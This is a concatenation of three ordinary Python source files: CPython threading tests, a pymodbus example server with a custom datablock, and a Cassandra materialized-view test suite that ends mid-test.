# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@cpython_only
@unittest.skipIf(_testcapi is None, "need _testcapi module")
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "genereator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
custom_datablock.py | #!/usr/bin/env python3
"""
Pymodbus Server With Custom Datablock Side Effect
--------------------------------------------------------------------------
This is an example of performing custom logic after a value has been
written to the datastore.
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from __future__ import print_function
from pymodbus.version import version
from pymodbus.server.asynchronous import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# create your custom data block here
# --------------------------------------------------------------------------- #
class CustomDataBlock(ModbusSparseDataBlock):
""" A datablock that stores the new value in memory
and performs a custom action after it has been stored.
"""
def setValues(self, address, value):
""" Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
"""
super(CustomDataBlock, self).setValues(address, value)
# whatever you want to do with the written value is done here,
# however make sure not to do too much work here or it will
# block the server, espectially if the server is being written
# to very quickly
print("wrote {} to {}".format(value, address))
def run_custom_db_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
block = CustomDataBlock([0]*100)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = version.short()
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
# p = Process(target=device_writer, args=(queue,))
# p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
if __name__ == "__main__":
run_custom_db_server()
|
materialized_views_test.py | import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate([nodes, 0], install_byteman=install_byteman)
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, **kwargs)
create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def update_view(self, session, query, flush, compact=False):
session.execute(query)
self._replay_batchlogs()
if flush:
self.cluster.flush()
if compact:
self.cluster.compact()
def _settle_nodes(self):
logger.debug("Settling all nodes")
stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")
def _settled_stages(node):
(stdout, stderr, rc) = node.nodetool("tpstats")
lines = re.split("\n+", stdout)
for line in lines:
match = stage_match.match(line)
if match is not None:
active = int(match.group('active'))
pending = int(match.group('pending'))
if active != 0 or pending != 0:
logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
return False
return True
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and not _settled_stages(node):
time.sleep(0.1)
attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
logger.debug("waiting for view")
def _view_build_finished(node):
s = self.patient_exclusive_cql_connection(node)
query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(s.execute(query))
return len(result) == 0
for node in self.cluster.nodelist():
if node.is_running():
attempts = 50 # 1 sec per attempt, so 50 seconds total
while attempts > 0 and not _view_build_finished(node):
time.sleep(1)
attempts -= 1
if attempts <= 0:
raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
"""Wait for the start of a MV build, ensuring that it has saved some progress"""
start = time.time()
while True:
try:
query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(session.execute(query))
assert 0 == result[0].count
except AssertionError:
break
elapsed = (time.time() - start) / 60
if elapsed > wait_minutes:
self.fail("The MV build hasn't started in 2 minutes.")
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
self._settle_nodes()
def _replay_batchlogs(self):
for node in self.cluster.nodelist():
if node.is_running():
logger.debug("Replaying batchlog on node {}".format(node.name))
node.nodetool("replaybatchlog")
# CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
node_session = self.patient_exclusive_cql_connection(node)
result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
if exists:
assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
if self.cluster.version() >= '3.11':
assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
else:
assert_none(session, "SELECT * FROM system.built_views")
if self.cluster.version() >= '3.11':
assert_none(session, "SELECT * FROM system_distributed.view_build_status")
assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
"""
drop keyspace or view should clear built_views and view_build_status
"""
session = self.prepare(rf=2, nodes=2)
def populate_data(session, rows):
logger.debug("populate base data")
for v in range(rows):
session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))
def verify_data(session, rows, views):
logger.debug("verify view data")
for v in range(rows):
for view in range(views):
assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])
def create_keyspace(session, ks="ks1", rf=2):
create_ks(session, ks, rf)
def create_table(session):
logger.debug("create base table")
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
def create_views(session, views, keyspace="ks1"):
logger.debug("create view")
for view in range(views):
session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view),
timeout=60)
self._wait_for_view(keyspace, "mv{}".format(view))
def drop_keyspace(session, keyspace="ks1"):
logger.debug("drop keyspace {}".format(keyspace))
session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace),
timeout=60)
def drop_views(session, views):
logger.debug("drop all views")
for view in range(views):
session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))
rows = 100
views = 5
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_keyspace(session)
self._assert_view_meta(session, views, exists=False)
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_views(session, views)
self._assert_view_meta(session, views, exists=False)
def test_create(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting 1 materialized view == got" + str(result)
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the bease table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def test_insert(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
assert len(result) == 2, "Expecting {} users, got {}".format(2 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
assert len(result) == 1, "Expecting {} users, got {}".format(1 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
assert len(result) == 0, "Expecting {} users, got {}".format(0 == len(result))
def test_populate_mv_after_insert(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
"""Test that a view is OK when created with existing data with wide rows"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
for i in range(5):
for j in range(10000):
session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(5):
for j in range(10000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
